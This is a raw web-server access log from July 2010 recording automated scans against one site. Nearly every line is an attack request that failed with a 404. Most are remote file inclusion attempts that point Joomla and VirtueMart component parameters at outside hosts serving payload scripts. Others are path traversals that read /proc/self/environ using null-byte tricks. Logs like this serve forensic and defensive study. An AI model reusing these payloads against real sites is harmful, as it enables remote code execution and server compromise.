82.188.100.195 - - [01/Jul/2010:23:48:06 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:48:58 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:48:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:48:59 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:49:06 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:49:07 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:49:07 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:51:58 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
82.188.100.195 - - [01/Jul/2010:23:52:58 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hycollege.net///appserv/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:53:42 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:53:42 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:54:25 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:54:26 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:54:26 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:54:27 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
78.41.233.128 - - [01/Jul/2010:23:54:27 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:46 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:50 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:54:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:47 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:55:49 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:55:55 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:55:56 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:55:56 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:45 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:45 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:45 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:56:47 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:15 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:57:20 -0700] "GET /logs/access_100331.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:57:20 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:57:21 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [01/Jul/2010:23:57:32 -0700] "GET /logs/access_100601.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
91.121.67.226 - - [01/Jul/2010:23:57:54 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:14 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:14 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:14 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:37 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:37 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [01/Jul/2010:23:58:37 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.18 - - [01/Jul/2010:23:59:00 -0700] "GET /logs/access_100601.log%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.18 - - [01/Jul/2010:23:59:00 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.18 - - [01/Jul/2010:23:59:00 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.18 - - [02/Jul/2010:00:01:10 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [02/Jul/2010:00:02:15 -0700] "GET /logs/access_100601.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.30 - - [02/Jul/2010:00:02:19 -0700] "GET /logs/access_100601.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:04:16 -0700] "GET /logs/access.log//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:04:16 -0700] "GET /logs//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:04:16 -0700] "GET /setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
77.221.130.18 - - [02/Jul/2010:00:04:27 -0700] "GET /logs/access_100601.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.tv-k.dk/includes/js/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:05:04 -0700] "GET /logs/access_100501.log//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:05:40 -0700] "GET /setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:05:40 -0700] "GET /logs/access.log//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:05:41 -0700] "GET /logs//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
80.48.73.1 - - [02/Jul/2010:00:06:24 -0700] "GET /logs/access_100501.log//setup.php?dir=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:26 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:28 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:57 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:57 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:08:58 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:09:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:09:12 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:09:12 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:14:18 -0700] "GET /senetman/html/index.php?page=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:14:18 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:14:18 -0700] "GET /logs/senetman/html/index.php?page=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:34 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:34 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:35 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:41 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:41 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:14:41 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:17:41 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:17:41 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:17:41 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:18:41 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:18:42 -0700] "GET /logs/access_100601.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.147.62.92 - - [02/Jul/2010:00:18:43 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:18:51 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:18:51 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:18:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:08 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
